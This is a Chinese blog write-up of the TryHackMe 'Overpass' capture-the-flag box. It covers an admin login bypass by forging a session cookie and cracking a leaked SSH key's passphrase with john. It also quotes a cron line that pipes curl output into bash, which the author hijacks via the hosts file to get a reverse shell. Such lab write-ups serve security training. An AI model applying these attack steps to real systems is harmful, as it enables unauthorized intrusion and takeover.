CTF靶机 Overpass 笔记

最新推荐文章于 2024-08-11 21:27:48 发布
最新推荐文章于 2024-08-11 21:27:48 发布
阅读量256 收藏
点赞数
分类专栏: Try Hack Me靶机 文章标签: 安全 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44101248/article/details/108446397
版权

Overpass

当一群计算机科学专业的学生试图创建一个密码管理器时会发生什么?

Nmap起手,先扫一波开放端口。得到22,80端口开放

访问80端口,是一个Overpass的网站页面

dirb一下目录,有个admin的目录

访问是一个登录的页面,感觉切入点应该在这,尝试了注入,登录绕过,弱口令均没有成功。

查看页面源代码时发先包含一个login.js的文件

如果页面没有Incorrect credentials时会把Cookie设置成SessionToken

 

尝试把Cookie的值改成SessionToken,值默认的 作用域改成/

改成这样

刷新页面,就进来了,页面里是一个ssh的私钥

这个应该是james用户的私钥

把私钥复制出来用john破解出密码

 

获取私钥的hash要用到ssh2john

git clone https://github.com/magnumripper/JohnTheRipper

克隆下来后用ssh2john 把hash重定向出来

看下重定向出来的hash

用john加载rockyou破解hash

得到密码james13

把记得id_rsa的权限设置成600才能用私钥登录

输入刚刚得到的密码

进来就能拿到user.txt flag 里面还有一个todo.txt的文件

提示有个构造的脚本

看下定时任务,里面有个curl overpass.thm/downloads/src/buildsript.sh | bash

请求overpass.thm网站的buoldscript.sh 并执行

那可以修改Hosts文件把overpass.thm的域名指向到我们的攻击机上。

再用python搭建构造这样一个目录结构的网站把shell弹回来

先把目录给创建好 mkdir downloads/src/

在把创建好的文件放进去,里面是个反弹shell

这边python网站很快就有反应

另外nc也要起个监听

nc起监听等待一会,马上shell 就回来了。直接查看root.txt

z4yn:)
关注
专栏目录
Tryhackme-Overpass
个人博客
09-06 1280
Overpass 文章目录OverpassOverpassTask1 OverpassOverpass 2 - Hackedtask1 Forensics - Analyse the PCAPtask2 Research - Analyse the codetask3 Attack - Get back in!Overpass 3-HostingTask1 Overpass3 - Adventures in Hosting Overpass Task1 Overpass nmap扫描,靶机开启22-ssh
CTF靶机 DC-3
weixin_52221158的博客
09-02 895
CTF靶场 DC-3详细讲解
CTF靶机 Blaster 笔记
z4yn:)的博客
06-28 421
Blaster 靶机描述 : 过去回忆的唤醒 复现CVE-2019-1388 靶机标签 :Windows,复现,特权 nmap扫一波 打开了两个端口 80 3389 访问80端口,用dirbuster扫目录 发现隐藏目录retro 访问发现类似博客,有一个wade用户 暴露了可能是密码的parzival(搞了好久没思路,问了朋友提示的 - -!) 尝试登录3389用xfreerdp,用了remmina和rdesktop都不行 xfreerdp /u:wa...
CTF7靶机渗透训练
weixin_44132032的博客
08-21 2839
CTF7靶机训练主机发现端口扫描查看服务器信息漏洞发现漏洞挖掘 ##环境下载 链接:https://pan.baidu.com/s/17IdF-74o278axL3Zj2V68A 提取码:kisb Tips:首次打开虚拟机时要选择“我已移动该虚拟机”选项。 此次训练其中一步为获取目标的账号密码,故目标环境无需登录。 主机发现 使用命令: netdiscover 端口扫描 使用命令: namp...
网络渗透测试实验四-CTF实践(WebDeveloper靶机渗透)
YatKTm的博客
12-06 3466
文章目录前言实验目的系统环境实验工具实验原理:1、什么是CTF1.1 CTF竞赛模式(1)解题模式(Jeopardy)(2)攻防模式(Attack-Defense)(3)混合模式(Mix)1.2 CTF各大题型简介MISC(安全杂项)PPC(编程类)CRYPTO(密码学)STEGA(隐写)PWN(溢出)WEB(web类)实验步骤和内容:目的基本思路实现过程:1、发现目标 (netdiscover),找到WebDeveloper的IP地址。2、利用NMAP扫描目标主机,发现目标主机端口开放、服务情况,截图并说
靶机渗透】BLOGGER: 1
weixin_47443077的博客
06-16 1051
靶机渗透】BLOGGER: 1 0x01靶机介绍 1.详情 链接: https://www.vulnhub.com/entry/blogger-1,675/ 2.描述 James M Brunner, A Web Developer has recently created a blog website. He hired you to test the Security of his Blog Website. Hack Your Way In Mr. Robot Style ???? 一位Web 开发
VulnhubJIS-CTF靶机详解
最新发布
weixin_62457642的博客
08-11 870
靶机JIS-CTF速刷
CTF靶机 Inclusion 笔记
z4yn:)的博客
06-28 255
Inclusion 靶机描述 : 初学者水平的LFI挑战 靶机标签 :文件包含,sudo 首先Namp扫一波 开放了22和80端口 访问80端口 URL是文件包含的页面 尝试访问/etc/passwd 发现里面有个账号密码 #falconfeast:rootpassword 登录ssh ssh falconfeast@10.10.134.11 查看user.txt 获取flag sudo -l 查看有sudo权限的命令 查看socat 提权方法h...
CTF6靶机实战.zip
05-25
本压缩包“CTF6靶机实战.zip”显然是一份用于CTF比赛的学习资料,包含了实战过程、反弹shell文件以及针对特定系统版本漏洞的利用脚本。 首先,我们要理解靶机的概念。在网络安全领域,靶机是模拟真实网络环境的...
CTF靶机实战-SMB信息泄露
Ewige的博客
06-05 1062
靶场: 和彩云 提取码:JiwY 百度网盘 提取码:676b
CTF渗透训练环境(镜像,视频,虚拟机)
12-26
靶机镜像,教学视频(SSH私钥泄露、SSH渗透root主机、SMB服务信息泄露、FTP服务后门利用、Sql-GET参数注入、Sql-POST参数...kali虚拟机(2022.4),虚拟机环境(Vmware、VirtualBox),下载环境来进行一次CTF渗透测试
CTF6靶机实战
千寻的博客
05-25 1746
文章目录总结CTF6靶机下载地址环境搭建靶机实战信息收集漏洞查找漏洞利用提权摘抄 总结 信息搜集,端口扫描,目录扫描,获取敏感目录和压缩包文件 下载源代码,进行审计代码,得到数据库账号和密码(发现账号和密码,其实和敏感目录下的一样) 敏感目录下,获取账号和密码(发现是主页的登陆账号密码) 使用msf生成php反向shell,通过文件上传漏洞上传shell,并访问进行触发 寻找Linux内核漏洞exp,提权root CTF6靶机下载地址 https://download.vulnhub.com/lamps
ftp服务后面漏洞——CTF靶机
panda.
10-24 374
使用metasploit平台扫描查看有无漏洞。使用nmap工具扫描靶机查看端口开放状态。渗透到靶机,并且权限是root权限。首先使用fping扫描靶机ip。发现有漏洞,使用漏洞并配置参数。扫描21端口服务版本信息。
常见的隐写工具的使用
z4yn:)的博客
09-28 5630
隐写术 常见的隐写工具的使用 steghide 隐藏文件 steghide embed -cf [载体] -ef [隐藏的文件] -p [设置密码] 例:steghide embed -cf sun.jpg -ef a.txt -p 123123 提取文件 steghide extract -sf sun.jpg steghide不支持png格式的隐写,zsteg支持png。 zsteg 用gem安装zsteg,没有小飞机的用国内的源 proxychains代理一挂,30秒安.
RootMe
z4yn:)的博客
10-09 1011
RootMe 获取root权限 先Nmap扫全端口,开放了22,80端口 在用Nmap -A 综合扫描指定的开放端口 只能从80端口入手,访问80 尝试访问一下robots.txt文件,不存在 用dirbutser扫网站目录,我一般配合dirb一起扫 两个都扫到一个uploads目录和panel目录 uploads通常用来放上传的文件 访问panel目录是个上传点,直接上传一个反弹shell的PHP脚本 用的是kali自带的PH...
CTF靶机 Agent sudo 笔记
z4yn:)的博客
06-23 989
Agent sudo 靶机介绍 : 你在深海里发现了一个秘密服务器。你的任务是侵入服务器内部并揭示真相。 靶机标签 : 枚举, 利用, 爆破, hash破解 Nmap扫一下发现3个开放端口 21, 22, 80 先访问80端口 访问网站需要修改User-Agent 为C才能触发到指定页面 可用BurpSuite抓包修改 也可以用kali自带的curl自定义请求包 curl -A "C" -L 10.10.183.111 发现一个用户名chris,根据提示要用这个用户名去爆破ftp协议 用Burp Sui
CTF靶机 Pickle Rick 笔记
z4yn:)的博客
06-23 943
Pickle Rick 靶机介绍 : 瑞克和莫蒂CTF。帮忙把瑞克变回人类! 靶机标签 : dirbuster, Linux, 命令执行 Nmap扫端口, 开放两个端口 22, 80 访问80端口 用dirbuster扫了目录发现一个登录页面, 没有账号密码 找了半天没找到账号密码, 根据提示查看页面源码看到了账号 - -! 密码是之前访问的robots.txt文件 - -! 登录页面发现是一个命令执行窗口 ls 查看第一个原料 查看flag时发现 cat 被...
TryHackMe - Poster靶场
z4yn:)的博客
03-11 932
Poster The sys admin set up a rdbms in a safe way. 0x01 简介 什么是rdbms? 根据EF-Codd关系模型,RDBMS允许用户构建、更新、管理和与关系数据库交互,关系数据库将数据存储为表。 当前,一些公司使用关系数据库代替平面文件或层次数据库来存储业务数据。这是因为关系数据库可以处理范围广泛的数据格式并有效地处理查询。此外,它将数据组织到可以基于公共数据进行内部链接的表中。这允许用户通过单个查询轻松检索一个或多个表。另一方面,平面文件将数据
命令执行
z4yn:)的博客
09-28 698
Injection 操作系统命令注入演练。演示OS命令注入 命令注入也称为命令注入 PHP常见的执行命令的函数:system() ; exec() ; shell_exec() ; popen() ; passthru() 等等。函数的返回结果不同,各位自行查阅。 Windows和Linux都支持的命令连接符 cmd1 | cmd2 只执行cmd2 cmd1 || cmd2 只有当cmd1执行失败后,cmd2才被执行 cmd1 &am...
ctf5靶机 sql
07-28
抱歉,我无法回答关于CTF靶机的问题。 #### 引用[.reference_title] - *1* *3* [Vulnhub-CTF6靶机实战](https://blog.csdn.net/kengkeng123qwe/article/details/124817304)[target="_blank" data-report-click={"spm...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值